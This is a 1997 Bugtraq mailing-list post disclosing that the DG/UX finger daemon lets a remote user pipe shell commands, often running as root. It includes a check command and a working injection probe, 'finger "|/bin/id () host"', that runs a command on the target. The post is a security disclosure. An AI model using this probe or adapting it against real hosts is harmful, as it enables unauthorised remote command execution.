Bugtraq: dgux in.fingerd vulnerability

Nmap Security Scanner

Intro

Ref Guide

Install Guide

Download

Changelog

Book

Docs
Security Lists

Bugtraq

Basics

More
Security Tools

More
Site News
Site Search:
Exploit World
Advertising
About/Contact
Credits
Sponsors:

Bugtraq mailing list archives

dgux in.fingerd vulnerability

From: gti () HOPI DTCC EDU (George Imburgia)
Date: Mon, 11 Aug 1997 12:32:38 -0400


Another old bug that won't die.

The finger daemon that ships with dgux will allow a remote user to pipe
commands, often with uid root or bin.

To check for this vulnerability, simply use the RFC compliant syntax;

finger /W () host

If it returns something like this, it may be vulnerable;

Login name: /W                          In real life: ???

To see the uid in.fingerd is running as, try this;

finger "|/bin/id () host"

Often, you will see something like this;

uid=0(root) gid=0(root)

or;

uid=2(bin) gid=2(bin) groups=2(bin),3(sys),5(mail)

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
= George Imburgia                       =
= Network Specialist, Computer Services =
= Office of the President               =
= Delaware Tech                         =
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

By Date By Thread

Current thread:

popper and qpopper let you read email from other pop clients dynamo () IME NET (Aug 07)
- Re: popper and qpopper let you read email from other pop clients Ian R. Justman (Aug 08)
  - solaris ^[[1J reboot Tobias Oetiker (Aug 10)
    - Re: solaris ^[[1J reboot Scott Moseman (Aug 11)
  - Re: popper and qpopper let you read email from other pop clients Marc Slemko (Aug 10)
  - dgux in.fingerd vulnerability George Imburgia (Aug 11)
  - procfs patch (fwd) Alex (Aug 11)
- Getting around non-executable stack (and fix) Solar Designer (Aug 10)